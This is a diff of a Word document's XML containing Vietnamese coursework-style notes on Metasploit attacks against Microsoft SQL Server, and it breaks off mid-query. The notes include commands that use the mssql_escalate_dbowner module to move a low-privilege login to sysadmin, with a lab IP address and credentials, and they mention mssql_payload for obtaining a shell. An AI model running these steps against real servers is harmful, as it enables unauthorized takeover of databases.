+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
@@ -3458,14 +3539,9 @@
           <w:szCs w:val="26"/>
           <w:lang w:val="vi-VN"/>
         </w:rPr>
-        <w:br w:type="page"/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="360"/>
-        <w:jc w:val="both"/>
+        <w:t xml:space="preserve">3.10 </w:t>
+      </w:r>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
@@ -3474,7 +3550,34 @@
           <w:szCs w:val="26"/>
           <w:lang w:val="vi-VN"/>
         </w:rPr>
-      </w:pPr>
+        <w:t>Tăng quyền lên systemadmin</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="12"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+        <w:t>use auxiliary/admin/mssql/</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3484,19 +3587,7 @@
           <w:szCs w:val="26"/>
           <w:lang w:val="vi-VN"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">3.10 </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:val="vi-VN"/>
-        </w:rPr>
-        <w:t>Tăng quyền lên systemadmin</w:t>
+        <w:t>mssql_escalate_dbowner</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3522,18 +3613,7 @@
           <w:szCs w:val="26"/>
           <w:lang w:val="vi-VN"/>
         </w:rPr>
-        <w:t>use auxiliary/admin/mssql/</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:val="vi-VN"/>
-        </w:rPr>
-        <w:t>mssql_escalate_dbowner</w:t>
+        <w:t>set rhosts 192.168.1.3</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3559,7 +3639,7 @@
           <w:szCs w:val="26"/>
           <w:lang w:val="vi-VN"/>
         </w:rPr>
-        <w:t>set rhosts 192.168.1.3</w:t>
+        <w:t>set username lowpriv</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3585,7 +3665,7 @@
           <w:szCs w:val="26"/>
           <w:lang w:val="vi-VN"/>
         </w:rPr>
-        <w:t>set username lowpriv</w:t>
+        <w:t>set password Password@1</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3611,32 +3691,6 @@
           <w:szCs w:val="26"/>
           <w:lang w:val="vi-VN"/>
         </w:rPr>
-        <w:t>set password Password@1</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="1"/>
-          <w:numId w:val="12"/>
-        </w:numPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:val="vi-VN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:val="vi-VN"/>
-        </w:rPr>
         <w:t>exploit</w:t>
       </w:r>
     </w:p>
@@ -3659,7 +3713,25 @@
           <w:szCs w:val="26"/>
           <w:lang w:val="vi-VN"/>
         </w:rPr>
-        <w:t>Module auxiliary/admin/mssql/mssql_escalate_dbowner trong Metasploit sẽ được sử dụng để nâng quyền người dùng từ db_owner lên sysadmin1. Nếu người dùng có vai trò db_owner trong một cơ sở dữ liệu đáng tin cậy do một người dùng sysadmin sở hữu, module này có thể được sử dụng để nâng quyền người dùng lên sysadmin. Khi người dùng có vai trò sysadmin, module msssql_payload có thể được sử dụng để nhận shell trên hệ thống.</w:t>
+        <w:t xml:space="preserve">Module auxiliary/admin/mssql/mssql_escalate_dbowner trong Metasploit sẽ được sử dụng để nâng quyền người dùng từ db_owner lên </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+        <w:t>sysadmin</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+        <w:t>. Nếu người dùng có vai trò db_owner trong một cơ sở dữ liệu đáng tin cậy do một người dùng sysadmin sở hữu, module này có thể được sử dụng để nâng quyền người dùng lên sysadmin. Khi người dùng có vai trò sysadmin, module msssql_payload có thể được sử dụng để nhận shell trên hệ thống.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3672,6 +3744,7 @@
           <w:color w:val="111111"/>
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
+          <w:lang w:val="vi-VN"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -3690,210 +3763,241 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t>set SQL SELECT r.name role_principal_name, m.name AS member_principal_name FROM sys.database_role_members rm JOIN sys.database_principals r ON rm.role_principal_id = r.principal_id JOIN sys.database_principals m ON rm.member_principal_id = m.principal_id</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="13"/>
-        </w:numPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:val="vi-VN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:val="vi-VN"/>
-        </w:rPr>
-        <w:t>mssql_current_user_escalation: Lệnh này có thể được sử dụng để thêm người dùng SQL hiện tại vào nhóm sysadmin.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="13"/>
-        </w:numPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:val="vi-VN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:val="vi-VN"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Kích một người dùng ra khỏi sysasmin: mssql_sql: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:val="vi-VN"/>
-        </w:rPr>
-        <w:t xml:space="preserve">ALTER SERVER ROLE </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:val="vi-VN"/>
-        </w:rPr>
-        <w:t>[</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:val="vi-VN"/>
-        </w:rPr>
-        <w:t>role_</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:val="vi-VN"/>
-        </w:rPr>
-        <w:t>name]</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:val="vi-VN"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> DROP MEMBER </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:val="vi-VN"/>
-        </w:rPr>
-        <w:t>[</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:val="vi-VN"/>
-        </w:rPr>
-        <w:t>database_</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:val="vi-VN"/>
-        </w:rPr>
-        <w:t>principal]</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:val="vi-VN"/>
-        </w:rPr>
-        <w:t>;</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:val="vi-VN"/>
-        </w:rPr>
-        <w:t xml:space="preserve">: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:val="vi-VN"/>
-        </w:rPr>
-        <w:t>set SQL "ALTER SERVER ROLE sysadmin DROP MEMBER user1;"</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="13"/>
-        </w:numPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:val="vi-VN"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:val="vi-VN"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Thêm vai trò db_owner: mssql_sql: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:val="vi-VN"/>
-        </w:rPr>
-        <w:t>set SQL "EXEC sp_addrolemember N'db_owner', N'[tên người dùng]';"</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:val="vi-VN"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        <w:t>set SQL SELECT r.name role_principal_name, m.name AS member_principal_name FROM sys.database_role_members rm JOIN sys.database_principals r ON rm.role_principal_id = r.principal_id JOIN sys.database_principals m ON rm.member_principal_id = m.principal_</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="111111"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>id</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:color w:val="111111"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. OR </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
           <w:b/>
           <w:bCs/>
+          <w:color w:val="FF0000"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+        <w:t>EXEC sp_helpuser 'minhnhat'</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="13"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+        <w:t>mssql_current_user_escalation: Lệnh này có thể được sử dụng để thêm người dùng SQL hiện tại vào nhóm sysadmin.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="13"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Kích một người dùng ra khỏi sysasmin: mssql_sql: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ALTER SERVER ROLE </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+        <w:t>[</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+        <w:t>role_</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+        <w:t>name]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> DROP MEMBER </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+        <w:t>[</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+        <w:t>database_</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+        <w:t>principal]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+        <w:t>;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+        <w:t>set SQL "ALTER SERVER ROLE sysadmin DROP MEMBER user1;"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="13"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Thêm vai trò db_owner: mssql_sql: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+        <w:t>set SQL "EXEC sp_addrolemember N'db_owner', N'[tên người dùng]';"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:val="vi-VN"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
           <w:lang w:val="vi-VN"/>
@@ -3908,20 +4012,9 @@
           <w:szCs w:val="26"/>
           <w:lang w:val="vi-VN"/>
         </w:rPr>
-        <w:br w:type="page"/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:val="vi-VN"/>
-        </w:rPr>
-      </w:pPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Mã hóa dữ liệu:</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3931,18 +4024,6 @@
           <w:szCs w:val="26"/>
           <w:lang w:val="vi-VN"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Mã hóa dữ liệu:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:val="vi-VN"/>
-        </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
@@ -4079,6 +4160,438 @@
           <w:lang w:val="vi-VN"/>
         </w:rPr>
         <w:t>msf auxiliary(mssql_sql) &gt; run</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:autoSpaceDE w:val="0"/>
+        <w:autoSpaceDN w:val="0"/>
+        <w:adjustRightInd w:val="0"/>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="19"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="FF00FF"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="19"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>UPDATE</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="19"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Job </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="0000FF"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="19"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>SET</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="19"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Title </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="808080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="19"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="19"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="FF00FF"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="19"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>CONVERT</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="808080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="19"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="0000FF"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="19"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>NVARCHAR</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="808080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="19"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="19"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>100</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="808080"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="19"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t>),</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="000000"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="19"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:color w:val="FF00FF"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="19"/>
+          <w:szCs w:val="19"/>
+        </w:rPr>
